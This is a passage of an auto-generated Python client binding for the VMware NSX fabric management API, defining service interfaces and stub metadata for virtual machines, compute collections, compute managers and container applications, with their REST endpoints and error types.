:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'host_id': host_id,
'included_fields': included_fields,
'lport_attachment_id': lport_attachment_id,
'owner_vm_id': owner_vm_id,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'vm_id': vm_id,
})
class VirtualMachines(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.virtual_machines'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _VirtualMachinesStub)
self._VAPI_OPERATION_IDS = {}
def list(self,
cursor=None,
display_name=None,
external_id=None,
host_id=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all virtual machines.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type display_name: :class:`str` or ``None``
:param display_name: Display Name of the virtual machine (optional)
:type external_id: :class:`str` or ``None``
:param external_id: External id of the virtual machine (optional)
:type host_id: :class:`str` or ``None``
:param host_id: Id of the host where this vif is located (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.VirtualMachineListResult`
:return: com.vmware.nsx.model.VirtualMachineListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'display_name': display_name,
'external_id': external_id,
'host_id': host_id,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def updatetags(self,
virtual_machine_tag_update,
):
"""
Update tags applied to the virtual machine. External id of the virtual
machine will be specified in the request body. Request body should
contain all the tags to be applied. To clear all tags, provide an empty
list. User can apply maximum 25 tags on a virtual machine. The
remaining 5 are reserved for system defined tags.
:type virtual_machine_tag_update: :class:`com.vmware.nsx.model_client.VirtualMachineTagUpdate`
:param virtual_machine_tag_update: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('updatetags',
{
'virtual_machine_tag_update': virtual_machine_tag_update,
})
class _ComputeCollectionFabricTemplatesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'compute_collection_fabric_template': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/compute-collection-fabric-templates',
request_body_parameter='compute_collection_fabric_template',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'fabric_template_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/fabric/compute-collection-fabric-templates/{fabric-template-id}',
path_variables={
'fabric_template_id': 'fabric-template-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'fabric_template_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/compute-collection-fabric-templates/{fabric-template-id}',
path_variables={
'fabric_template_id': 'fabric-template-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'compute_collection_id': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/compute-collection-fabric-templates',
path_variables={
},
query_parameters={
'compute_collection_id': 'compute_collection_id',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'fabric_template_id': type.StringType(),
'compute_collection_fabric_template': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/fabric/compute-collection-fabric-templates/{fabric-template-id}',
request_body_parameter='compute_collection_fabric_template',
path_variables={
'fabric_template_id': 'fabric-template-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplateListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.compute_collection_fabric_templates',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ComputeCollectionsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'cc_ext_id': type.StringType(),
'action': type.OptionalType(type.StringType()),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/compute-collections/{cc-ext-id}',
path_variables={
'cc_ext_id': 'cc-ext-id',
},
query_parameters={
'action': 'action',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'cc_ext_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/compute-collections/{cc-ext-id}',
path_variables={
'cc_ext_id': 'cc-ext-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cm_local_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'discovered_node_id': type.OptionalType(type.StringType()),
'display_name': type.OptionalType(type.StringType()),
'external_id': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'node_id': type.OptionalType(type.StringType()),
'origin_id': type.OptionalType(type.StringType()),
'origin_type': type.OptionalType(type.StringType()),
'owner_id': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/compute-collections',
path_variables={
},
query_parameters={
'cm_local_id': 'cm_local_id',
'cursor': 'cursor',
'discovered_node_id': 'discovered_node_id',
'display_name': 'display_name',
'external_id': 'external_id',
'included_fields': 'included_fields',
'node_id': 'node_id',
'origin_id': 'origin_id',
'origin_type': 'origin_type',
'owner_id': 'owner_id',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.VoidType(),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollection'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.compute_collections',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ComputeManagersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'compute_manager': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeManager'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/compute-managers',
request_body_parameter='compute_manager',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'compute_manager_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/fabric/compute-managers/{compute-manager-id}',
path_variables={
'compute_manager_id': 'compute-manager-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'compute_manager_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/compute-managers/{compute-manager-id}',
path_variables={
'compute_manager_id': 'compute-manager-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'origin_type': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'server': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/compute-managers',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'origin_type': 'origin_type',
'page_size': 'page_size',
'server': 'server',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'compute_manager_id': type.StringType(),
'compute_manager': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeManager'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/fabric/compute-managers/{compute-manager-id}',
request_body_parameter='compute_manager',
path_variables={
'compute_manager_id': 'compute-manager-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeManager'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeManager'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeManagerListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeManager'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.compute_managers',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ContainerApplicationInstancesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'container_application_instance_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-application-instances/{container-application-instance-id}',
path_variables={
'container_application_instance_id': 'container-application-instance-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'container_application_id': type.OptionalType(type.StringType()),
'container_cluster_id': type.OptionalType(type.StringType()),
'container_project_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-application-instances',
path_variables={
},
query_parameters={
'container_application_id': 'container_application_id',
'container_cluster_id': 'container_cluster_id',
'container_project_id': 'container_project_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerApplicationInstance'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerApplicationInstanceListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.container_application_instances',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ContainerApplicationsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'container_application_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-applications/{container-application-id}',
path_variables={
'container_application_id': 'container-application-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'container_cluster_id': type.OptionalType(type.StringType()),
'container_project_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-applications',
path_variables={
},
query_parameters={
'container_cluster_id': 'container_cluster_id',
'container_project_id': 'container_project_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerApplication'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerApplicationListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.container_applications',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ContainerClusterNodesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'container_cluster_node_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
